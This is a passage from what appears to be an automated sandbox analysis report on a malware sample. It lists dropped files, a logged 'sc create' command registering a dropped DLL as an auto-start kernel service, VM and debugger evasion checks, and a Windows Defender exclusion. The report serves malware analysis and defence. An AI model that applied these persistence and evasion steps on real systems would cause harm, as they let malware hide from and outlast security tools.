Source: yvaKqhmD4L.tmp.0.drStatic PE information: real checksum: 0x0 should be: 0x343825
Source: update.vbc.6.drStatic PE information: real checksum: 0x0 should be: 0x3789ec
Source: yvaKqhmD4L.tmp.5.drStatic PE information: real checksum: 0x0 should be: 0x343825
Source: update.vbc.1.drStatic PE information: real checksum: 0x0 should be: 0x3789ec
Source: yvaKqhmD4L.exeStatic PE information: real checksum: 0x0 should be: 0x673fbf
Source: hrsw.vbc.6.drStatic PE information: real checksum: 0x0 should be: 0x3789ec
Source: tProtect.dll.12.drStatic PE information: real checksum: 0x1eb0f should be: 0xfc66
Source: yvaKqhmD4L.exeStatic PE information: section name: .didata
Source: yvaKqhmD4L.tmp.0.drStatic PE information: section name: .didata
Source: update.vbc.1.drStatic PE information: section name: .00cfg
Source: update.vbc.1.drStatic PE information: section name: .voltbl
Source: update.vbc.1.drStatic PE information: section name: .aQ#
Source: yvaKqhmD4L.tmp.5.drStatic PE information: section name: .didata
Source: 7zr.exe.6.drStatic PE information: section name: .sxdata
Source: update.vbc.6.drStatic PE information: section name: .00cfg
Source: update.vbc.6.drStatic PE information: section name: .voltbl
Source: update.vbc.6.drStatic PE information: section name: .aQ#
Source: hrsw.vbc.6.drStatic PE information: section name: .00cfg
Source: hrsw.vbc.6.drStatic PE information: section name: .voltbl
Source: hrsw.vbc.6.drStatic PE information: section name: .aQ#
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpCode function: 6_2_6C1FBDDB push ecx; ret 6_2_6C1FBDEE
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpCode function: 6_2_6C0A0F00 push ss; retn 0001h6_2_6C0A0F0A
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpCode function: 6_2_6C2C9F10 push eax; ret 6_2_6C2C9F2E
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpCode function: 6_2_6C22E9F4 push 004AC35Ch; ret 6_2_6C22EA0E
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpCode function: 6_2_6C2CA290 push eax; ret 6_2_6C2CA2BE
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00CF45F4 push 00D9C35Ch; ret 10_2_00CF460E
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D8FB10 push eax; ret 10_2_00D8FB2E
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D8FE90 push eax; ret 10_2_00D8FEBE
Source: update.vbc.1.drStatic PE information: section name: .aQ# entropy: 7.189081398239323
Source: update.vbc.6.drStatic PE information: section name: .aQ# entropy: 7.189081398239323
Source: hrsw.vbc.6.drStatic PE information: section name: .aQ# entropy: 7.189081398239323
Source: C:\Users\user\Desktop\yvaKqhmD4L.exeFile created: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpJump to dropped file
Source: C:\Users\user\Desktop\yvaKqhmD4L.exeFile created: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpFile created: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpFile created: C:\Users\user\AppData\Local\Temp\is-8H1GS.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeFile created: C:\Program Files (x86)\Windows NT\tProtect.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpFile created: C:\Users\user\AppData\Local\Temp\is-IAK5G.tmp\update.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpFile created: C:\Program Files (x86)\Windows NT\7zr.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpFile created: C:\Users\user\AppData\Local\Temp\is-8H1GS.tmp\update.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpFile created: C:\Users\user\AppData\Local\Temp\is-IAK5G.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpFile created: C:\Users\user\AppData\Local\Temp\is-8H1GS.tmp\update.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpFile created: C:\Users\user\AppData\Local\Temp\is-IAK5G.tmp\update.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpFile created: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Users\user\Desktop\yvaKqhmD4L.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\yvaKqhmD4L.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Query firmware table information (likely to detect VMs)
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpSystem information queried: FirmwareTableInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6851Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2924Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpWindow / User API: threadDelayed 604Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpWindow / User API: threadDelayed 571Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpWindow / User API: threadDelayed 521Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-8H1GS.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\tProtect.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-IAK5G.tmp\update.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-IAK5G.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-8H1GS.tmp\update.vbcJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeAPI coverage: 7.5 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2916Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpCode function: 6_2_6C1EE090 FindFirstFileA,FindClose,FindClose,6_2_6C1EE090
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00CF6868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,10_2_00CF6868
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00CF7496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,10_2_00CF7496
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00CF9C60 GetSystemInfo,10_2_00CF9C60
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: yvaKqhmD4L.tmp, 00000001.00000002.1767908498.00000000015C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: yvaKqhmD4L.tmp, 00000001.00000002.1767908498.00000000015C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\G'd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Contains functionality to hide a thread from the debugger
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpCode function: 6_2_6C073886 NtSetInformationThread 00000000,00000011,00000000,000000006_2_6C073886
Hides threads from debuggers
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpProcess queried: DebugPortJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpCode function: 6_2_6C203871 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_6C203871
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D757D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,10_2_00D757D0
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpCode function: 6_2_6C20D425 mov eax, dword ptr fs:[00000030h]6_2_6C20D425
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpCode function: 6_2_6C20D456 mov eax, dword ptr fs:[00000030h]6_2_6C20D456
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpCode function: 6_2_6C20286D mov eax, dword ptr fs:[00000030h]6_2_6C20286D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpCode function: 6_2_6C203871 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_6C203871
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpCode function: 6_2_6C1FC3AD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_6C1FC3AD

HIPS / PFW / Operating System Protection Evasion

barindex
Adds a directory exclusion to Windows Defender
